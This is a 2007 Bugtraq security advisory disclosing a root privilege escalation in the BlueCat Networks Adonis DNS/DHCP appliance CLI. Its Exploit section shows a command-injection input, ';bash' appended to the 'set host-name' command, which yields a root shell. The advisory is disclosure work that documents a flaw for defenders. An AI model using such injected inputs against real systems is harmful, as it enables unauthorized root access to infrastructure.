| Main Archive Page > Month Archives > bugtraq archives |
TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation
From: anonymous.c7ffa4057a <anonymous.c7ffa4057a_at_nospam>Date: Thu Aug 16 2007 - 16:50:28 GMT
To: bugtraq@securityfocus.com
Template Security Security Advisory
BlueCat Networks Adonis CLI root privilege escalation
Date: 2007-08-16
Advisory ID: TS-2007-003-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0
Contents
Summary
Software Version
Details
Impact
Exploit
Workarounds
Obtaining Patched Software
Credits
Revision History
Summary
Template Security has discovered a root privilege escalation vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance which allows the admin user to gain root privilege from the Command Line Interface (CLI).
Software Version
Adonis version 5.0.2.8 was tested.
Details
The admin account on the Adonis DNS/DHCP appliance provides access to a CLI that allows an administrator to perform tasks such as setting the IP address, netmask, system time and system hostname. By entering a certain command sequence, the administrator is able to execute a command as root.
Impact
Access to the admin account is the same as root access on the appliance.
Exploit
Here we use the 'set host-name' CLI command to execute a root shell:
:adonis>set host-name ;bash
adonis.katter.org
root@adonis:~# id
uid=0(root) gid=0(root) groups=0(root)
NOTE: There may be other command sequences that accomplish the same result.
Workarounds
Only provide admin account access to administrators that also have root account access on the appliance.
Obtaining Patched Software
Contact the vendor.
Credits
forloop discovered this vulnerability while enjoying a Tuborg Gold. forloop is a member of Template Security.
Revision History
2007-08-16: Revision 0 released